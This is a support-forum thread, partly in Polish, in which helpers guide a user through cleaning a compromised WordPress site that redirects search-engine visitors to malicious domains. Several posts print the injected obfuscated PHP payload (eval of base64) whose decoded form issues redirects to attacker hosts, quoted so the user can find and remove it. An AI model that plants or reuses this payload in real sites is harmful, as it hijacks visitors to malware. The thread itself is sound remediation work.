www redirections

[klogier]

Proszę jeszcze raz, może tym razem w rodzinnym języku.

[polonus]

Witam klogier.

A teraz po polsku.

Sprawdź dokładnie otrzymany kod gdzie zostal zmienony. Wróć spowrotem do kodu oryginalnego jeżeli to możliwe i usuń wszystko co jest złe i nie jest możliwe do naprawienia. Cała te operację rób bardzo dokładnie, inaczej nie osiągniesz zamierzonego efektu. Masz do naprawienia 843 spraw.
Jeżeli wszystko pójdzie OK możesz zrobić aktualizację WP,

pozdrawiam,

Damian

[klogier]

Tak też zrozumiałem wcześniej, ale wolałem się upewnić.
Czyli mam klikać delete tam gdzie jest taka opcja i wróć do oryginału tam gdzie jest taka opcja ? Pytam dla pewności, mam nadzieję że nie muszę szukać notepadem odpowiednich linii w kodzie plików i usuwać je, tylko robię to z okna tego skanera ?

[polonus]

Witam klogier,

Bądź mądry przed szkodą . Dlaczego masz pełny backup wszystkich plików WordPressa teraz.
Zabezpieczymy się przed utratą ważnych danych.

pozdrawiam,

Damian

[klogier]

Ok, after cleaning by Wordfence hxxp://targetservice.pl doesn't exist, and I don't have access to WP dashboard. Any ideas?

[polonus]

Do not know what you have been doing, but go to: http://webcache.googleusercontent.com/search?client=flock&channel={flock%3Acontext}&q=cache:arfWkA0tZKwJ:http://targetservice.pl/%2Btargetservice.pl&oe=utf-8&hl=en&ct=clnk
Wait for !Donovan to guide you through the restoring from the back-up you made beforehand...
It is recommended you only use Wordfence to get your site into a running state in
order to recover the data you need to do a full reinstall...

polonus

[polonus]

What is worse I get a disconnected and again your site is being redirected:
Header returned by request for: http://targetservice.pl

HTTP/1.1 302 Moved Temporarily
Date: Thu, 07 Mar 2013 19:56:37 GMT
Server: Apache
Location: hxtp://opec.lflink.com/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html

What  I see there is only this:
DOMAIN##/   Apache   Thu, 07 Mar 2013 20:15:41 GMT   1   80   62.212.76.142   1            0
FOLDER##/   200   0   0   0   0   0
FILE##_index_defaultpage.html   272   text/html      200   Mon, 25 Jun 2012 11:19:09 GMT   44      1   0   0   1   1   -1   44   0   0   0   0   1   


The site opec.lflink dot com has been infecting 193 sites and now yours is being reinfected: http://labs.sucuri.net/?details=opec.lflink.com
See: http://urlquery.net/report.php?id=1289019

This was the last zulu zscaler report: http://zulu.zscaler.com/submission/show/05123b6375a6bd164a30b4f18cad49c2-1362075783
and this the most recent: http://zulu.zscaler.com/submission/show/05123b6375a6bd164a30b4f18cad49c2-1362687012

some suggestions how to keep your website clean:

    * Keep your website engine updated (including all themes/modules and etc).
    * Use dedicated/virtual server for your websites if possible.
    * Change all the passwords and make them more complicated.

polonus

[!Donovan]

Hi klogier,

If you would, please create a backup of your current WordPress backup.

We shall attempt the manual approach.

First, please download and extract Notepad++. It can be downloaded as a zip file here.

After the extraction has finished, open Notepad++.exe. It should be located inside the unicode folder.

Then, press Ctrl+Shift+F. If you cannot, click on Search > Find in files...



You should see something like this:



Change the directory location to where you saved your 2nd backup version of WordPress. Leave filters empty and check the "In hidden folders" checkbox. "In all sub-folders" should already be checked.

Under "Find What", paste the following:

Code: [Select]

eval(base64_decode("DQ plcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcGVydC5xcG9lLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));Note: Remove the space near base64_decode("DQ...

Finally, click the "Replace In Files" button.

After that, please rescan the 2nd backup directory with avast! and report the results.

See attached if you're having trouble finding the buttons.

Thanks,
~!Donovan

[polonus]

Hi !Donovan,

Thank you and I trust you can work klogier through that part of his WP ordeal.

Now first some further info about the recent and previous redirect. I assume this is some Malware Network Compromised Redirect as we call this.
klogier's site -http://targetservice.pl/  is hosted at 62.212.76.142 state now redirected.
IP 62.212.76.142 uses the reverse pointer s91.linuxpl dot com only.
For the redirect to opec.lflink dot com/ I get a Server error: 403 Forbidden and mentioned site is redirecting visitors and also visitors coming from search engines  to the URL: htxp://restmee.net/in/?pid=16&lid=79&page=/horo2013/&p=0&s=4606
-> http://aw-snap.info/file-viewer/?tgt=+http%3A%2F%2Frestmee.net%2Fin%2F%3Fpid%3D16%26lid%3D79%26page%3D%2Fhoro2013%2F%26p%3D0%26s%3D4606&ref_sel=Google&ua_sel=ff
This URL is at IP: 93.170.108.41  a dummy description from camxx.ru (SEO DNS - Detected a Dynamic DNS URL,  93.170.0.0/15 Dummy description for 93.170.0.0/15AS44546   AS44546 (not announced) re: http://www.mywot.com/en/scorecard/restmee.net
earlier in this threat  the other redirect was from 62.212.76.142 to 31.148.220.14 (also fraudulent)
31.148.220.14 resolves to ASN   AS5580 Atrato IP Networks (also with malicious URLs and current events)
Location   [Netherlands] Netherlands
This URL is not confirmed as malicious. I get: HTTP/1.0 302 Found
X-Powered-By: PHP/5.3.5-1ubuntu7.11
Set-Cookie: vc=NL; path=/; domain=46.183.147.108
Set-Cookie: uid=2876; path=/; domain=46.183.147.108
Set-Cookie: pid=16; path=/; domain=46.183.147.108
Set-Cookie: s=4606; path=/; domain=46.183.147.108
Set-Cookie: bs=1; path=/; domain=46.183.147.108
Set-Cookie: ref=0; path=/; domain=46.183.147.108
Set-Cookie: ctr=1-1; path=/; domain=46.183.147.108
Set-Cookie: mf_popup=0; path=/; domain=46.183.147.108
Set-Cookie: data=deleted; expires=Thu, 08-Mar-2012 10:01:00 GMT; path=/; domain=46.183.147.108
Set-Cookie: lid=79; path=/; domain=46.183.147.108
Location: http://46.183.147.108/horo2013/ see: http://urlquery.net/report.php?id=1318268
Content-type: text/html
Content-Length: 0
Date: Fri, 08 Mar 2013 10:01:01 GMT
Server: lighttpd/1.4.28
Connection: close
Here I also get a disconnected and this:
HTTP/1.0 404 Not Found
X-Powered-By: PHP/5.3.5-1ubuntu7.11
Content-type: text/html
Content-Length: 123
Connection: close
Date: Fri, 08 Mar 2013 10:24:28 GMT
Server: lighttpd/1.4.28


<h2>Error 404</h2>

<div class="error">
Невозможно обработать запрос &quot;horo2013&quot;.</div>
Re to decode: http://www.phpkode.com/source/p/pyrocms/pyrocms-pyrocms-fc6071c/system/codeigniter/language/russian/ftp_lang.php
['ftp_unable_to_connect'] ....
And we can establish that there must be abusive php ftp attacks going on there originating from camxx.ru (Badness going on in Holland!)

So this is all taking place on the server in the Netherlands: http://urlquery.net/report.php?id=1318303
AS16265 LeaseWeb B.V. has quite some reputation for allowing dubious practices on it's servers, see the Badness Graphics at Sitevet.

AS Name: LEASEWEB LeaseWeb B.V.

IPs allocated: 349184

Blacklisted URLs: 4642

Hosts...

...malicious URLs? Yes

...badware? Yes

...botnet C&C servers? No

...exploit servers? Yes

...Zeus botnet servers? Yes

...Current Events? Yes

...phishing servers? Yes

...spam servers? Yes

...spam bots? Yes

...spam activity? Yes

polonus

[polonus]

Here we see the final redirect's scan results: http://antivirus-alarm.ru/proverka/?url=restme.net%2Fin%2F%3Fpid%3D16%26lid%3D76%26page%3D%2Fgta5%2F%26p%3D0%26s%3D4503

polonus

[klogier]

Hi.
notepad++ didn't find below code in any file

Code: [Select]

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcGVydC5xcG9lLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

[!Donovan]

Did you follow all the instructions I mentioned? Did you select the correct directory?

~!Donovan

[klogier]

Probably, please look at printscreens.

Mayby it will be better if I send you all backup and you will check it by you own?

[!Donovan]

The string should've been found.. can you try rescanning the directory with avast!, then report the results?

[klogier]

Scan report
502 threats
I looked in to one of files by MS notepad and I think there is similar string but not the same that you gave me.

Code: [Select]

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9vcGVjLmxmbGluay5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));